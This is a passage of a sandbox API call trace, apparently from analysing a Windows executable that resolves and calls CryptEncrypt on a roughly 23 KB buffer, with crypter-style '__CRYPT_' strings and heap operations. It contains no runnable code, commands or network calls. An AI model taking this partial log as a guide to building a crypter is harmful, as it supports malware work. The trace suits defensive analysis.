out: lpMsg=0x8cf3b8) returned 0 [0264.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.928] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0264.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0264.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.928] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.928] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.929] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0264.929] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0264.929] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.929] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0264.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.929] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.929] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0264.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0264.929] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.929] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.929] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.929] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0264.930] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.930] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.930] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.930] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0264.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51d78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0264.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0264.931] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0264.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0264.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54530 [0264.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0264.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0264.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0264.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0264.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0264.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0264.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0264.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0264.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0264.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0264.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0264.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0264.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0264.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0264.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0264.932] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x5c4b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x5c50) returned 1 [0264.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0264.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0264.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0264.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0264.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0264.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0264.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0264.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0264.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0264.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0264.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0264.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0264.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0264.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0264.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0264.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0264.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0264.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0264.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0264.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0264.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0264.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0264.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0264.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0264.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0264.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0264.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0264.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0264.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0264.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0264.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0264.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0264.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0264.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0264.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0264.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0264.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0264.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0264.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0264.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0264.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0264.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0264.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0264.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0264.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0264.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0264.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0264.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0264.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0264.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0264.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0264.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0264.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0264.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0264.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0264.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0264.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0264.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0264.935] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0264.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0264.936] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.936] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.936] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0264.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0264.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0264.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0264.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0264.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0264.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0264.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0264.937] CharLowerBuffW (in: lpsz="byte[23632]", cchLength=0xb | out: lpsz="byte[23632]") returned 0xb [0264.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0264.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0264.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0264.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0264.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0264.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0264.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0264.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0264.937] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0264.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0264.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0264.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0264.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0264.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0264.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0264.938] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.938] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0264.939] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0264.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0264.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0264.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0264.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0264.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51e50 [0264.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51e50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0264.939] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f27520*, pdwDataLen=0x8cef60*=0x5c4b, dwBufLen=0x5c50 | out: pbData=0x2f27520*, pdwDataLen=0x8cef60*=0x5c50) returned 1 [0264.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f148d8 [0264.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0264.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0264.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0264.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0264.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0264.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0264.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0264.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0264.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0264.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0264.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0264.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0264.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0264.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0264.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0264.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0264.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0264.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0264.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0264.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0264.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0264.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0264.941] 